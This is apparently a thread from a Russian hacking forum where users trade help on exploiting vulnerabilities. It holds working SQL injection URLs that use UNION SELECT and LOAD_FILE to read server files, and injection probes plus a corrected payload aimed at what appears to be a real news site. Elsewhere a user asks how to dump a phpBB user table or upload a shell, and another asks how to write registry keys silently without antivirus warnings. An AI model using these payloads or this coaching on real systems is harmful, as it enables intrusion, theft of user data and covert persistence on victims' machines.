Ваши вопросы по уязвимостям.

kevmen Вопросы я смотрю пошли по кругу, на них уже отвечали , кури это :
https://forum.antichat.ru/threadnav34338-1-10.html

и вообще, давай сначала хоть что-то читай, потом вопросы по прочитанному

 

jokester,хорошо,я читаю вот это
http://forum.antichat.ru/thread43966.html

и вопросы у меня именно по прочитанному)

 

какие вопросы?? при экранировании кавычек into outfile не работает тк требует использования этих самых кавычек в синтаксисе.

 

http://localhost/view_cat.php?cat=-1+union+select+1,2,LOAD_FILE(0x766965775f6361742e706870),4,5,6,7,8,9

ну вот )хочу прочесть файл view_cat.php.Страница отображается верно,но содержание файла не выводится ,я никогда не сталкивался с такими вещами,поэтому не знаю,как должна отображатся страница)извините,если пишу что-то не так и не то

 

kevmen
ПУТЬ ДО ФАЙЛА, об этом ВЕЗДЕ написано !!!!

Ты говорил , что читаешь это
https://forum.antichat.ru/thread43966.html

, так вот оттуда выдержка:

 

kevmen,
user()
==>
select file_priv from mysql.user where user = blablabla

@localhost не пиши в юзнейме

 

jokester,спасибо)получилось,опять невнимательность)
http://localhost/view_cat.php?cat=1+union+select+1,2,LOAD_FILE(0x5a3a5c686f6d655c6c6f63616c686f73745c7777775c7363686f6f6c5c766965775f6361742e706870),4,5,6,7,8,9

 

я до этого еще не дошел,сейчас читаю
https://forum.antichat.ru/threadnav34338-1-10.html

 

что думаете?

 

первая )+order+by+32--+
вторая не открывается

 

а что это означает?

 

http://www.mormontimes.com/mormon_voices/?id=3237+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32

я так понял стоит фильтрация на union?

 

Code:

http://www.mormontimes.com/mormon_voices/?id=3237)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32--+

Чтобы увидеть вывод: =-3237)+union...

 

с чего ты взял что там 32 поля?

+order+by+ - не прокатывает
+union+ - вроде как отключен

 

Code:

http://www.mormontimes.com/mormon_voices/?id=3237)+order+by+32--+

Читайте внимательнее, сверху же l1ght написал....

Что значит "union отключен"? )))

 

2Neponomat чтоб добавить запись в реестр без запроса юзай так: "regedit /s 1.reg"

 

Урлу сюда

 

здравствуйте
у меня есть доступ к админке phpbb 2.0.13
мне нужно слить базу ~200 метров, но мне надо только таблу с юзерами
захожу в Backup Database, там выбираю Full backup, но сливается только 80% базы, а в конце дампа ошибка
SQL Error : 2013 Lost connection to MySQL server during query<br /><br />SHOW FIELDS FROM phpbb_ranks</br /><br />Line : 375<br />File : admin_db_utilities.php

как слить таблицу phpbb_users, или как залить шелл в phpbb 2.0.13

 

https://forum.antichat.ru/showpost.php?p=198446&postcount=3

 

чётат так не юзаеься ) куда это так надо написать?
а если заюзать вот так, но только без оповещения и без удаления в конце. как лучше? антивирус молчит на такие действия

WSHShell = WScript.CreateObject("WScript.Shell"); WSHShell.Popup("Создаем раздел"); WSHShell.RegWrite("HKCU\\MyRegKey\\", "Primer"); WSHShell.Popup("Создаем строковый параметр"); WSHShell.RegWrite("HKCU\\MyRegKey\\String", 1); WSHShell.Popup("Создаем параметр DWORD"); WSHShell.RegWrite("HKCU\\MyRegKey\\DWORD", 2, "REG_DWORD"); WSHShell.Popup("Создаем двоичный параметр"); WSHShell.RegWrite("HKCU\\MyRegKey\\Binary", 3, "REG_BINARY"); WSHShell.Popup("Удаляем все параметры"); WSHShell.RegDelete("HKCU\\MyRegKey\\String"); WSHShell.RegDelete("HKCU\\MyRegKey\\DWORD"); WSHShell.RegDelete("HKCU\\MyRegKey\\Binary"); WSHShell.Popup("Удаляем раздел"); WSHShell.RegDelete("HKCU\\MyRegKey\\");